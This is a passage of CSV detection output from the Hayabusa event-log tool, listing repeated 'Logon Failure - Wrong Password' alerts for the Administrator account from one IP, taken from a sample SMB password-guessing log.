NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.184 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yO2JYd6FfM2Y7px9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.225 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ltr5g8ZWUAdrPKxg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.272 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fjiPMy5uOTbbmaQ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.296 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HDRVOzxca9wDJziV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.333 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DV28RjUK26Je2Dr9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.382 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seoetT43w0S3FEss | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.422 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IdIU9Q9Ig4Bd3Aps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.468 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGzuHSHT59Qnp5jI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.525 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wPA1J7aQrZ064WSf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.576 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhLFXDMUKGfdoc4S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.621 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: apVAhc6o3dhLmUll | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.656 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
FYMdQeB4ZpFm8xDh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.698 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QewW1ISqRdXwtSXA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.734 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SFhBcgZfc9VZ5S8S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.776 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a4ZSRW7F65yDNbJd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.809 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HrbzGNYIbjErVtDR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.853 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eFcGaL3asLVIF08d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.892 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: dhJvIM5PzA9U6GTD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.942 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KYrfD15TPp8OuST4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.978 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8d4CbZSTHhl7fRfa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.027 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IItrtl1h3PsKviaQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.075 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WVeoptuwLNKlm0V2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.222 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rf6Ri9Lm81mScRt4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.282 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: NPVkTRUILL5czcbF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.333 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QZJq3kjykwzh0hVh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.374 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lHL4KuirjQ96Dgfw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.418 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DSPjDklMHdW6LqK5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.464 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EL0oMweyFgI0MEdM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.514 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NJS2dZhWmCGF1Qos | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.560 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: bNR5dXXnx0LeyNmW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.605 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ApUMxqDiqDNo6hrF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.653 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o3d1caGukhhBHp6s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.697 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oxDVCaWpkSECRoml | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.748 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: coqijUGaaVJXY4GV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.790 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ATPa6qMbfQ9QDrW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.840 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mnQEE00r01jhCNzr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.946 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ir9sY7kG6vbOad4z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:50.989 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: REuk1RZ5eRs3pSbT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.035 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 91gfIcAUvKrSAENh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.073 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MtrVV1ux0v5w5XWZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.117 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rFpyAqPQP77Ls6ir | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:51:51.156 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nvwp4DimL7SgBmb0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.202 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1lnJZDjghQNQxfG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.253 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pBN1g8NBIj6WMrhz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.291 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cJMUobtFTwOQTgqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.333 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QGZeGqe9rC172BVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.388 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zNP99dMvvDQl8WVw | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.428 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qcwp0odjR0LfM11y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.480 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6VjaFCzZr8iUUovn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.520 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C3YniJHC0Cswfti0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.560 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 63lZpExTzSzNR96C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.602 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fKI61MTXJ5x9WF56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.654 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhWYNEPWgh03cQSJ | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.688 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pvZg2LTYtsUhvBhr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.728 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BENGUFtNxdPjaS03 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.778 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fY1s0OG9JR38H6rm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.825 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LblLG1Il6ngkuAOo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.884 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PAZ83Onp00vURKSz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.942 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
BxvywmA4UMI04zm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:51.997 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1vH6DSer71gxEDRc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.057 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uDNQibannB453BKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.101 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 02qkYtCIrOj38agd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.150 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: atDwGfxC4RLYYDAF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.195 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fCTUmKwLxkKCoCTn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.236 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: DBE7Y8yJMNSkJlaK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.276 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N7VGVfH05BC7bgaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.309 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lP7kC2ayRIEeL5sw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.357 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2cQOn41cB2t0ZkSP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.398 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PpOyXZwlcCw63tWP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.445 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7R8yD7A0lCU16Z0t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.481 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: frasd7f8On0O7B6k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.529 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtOqqV6rkCIZPPFG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.585 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lnwn4dc1lKABRKxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.624 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CiUnLFzfXR6rER9B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.668 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1InESrL0ebaRw2z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.712 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IlLAG8gXt9YNeW4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.757 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
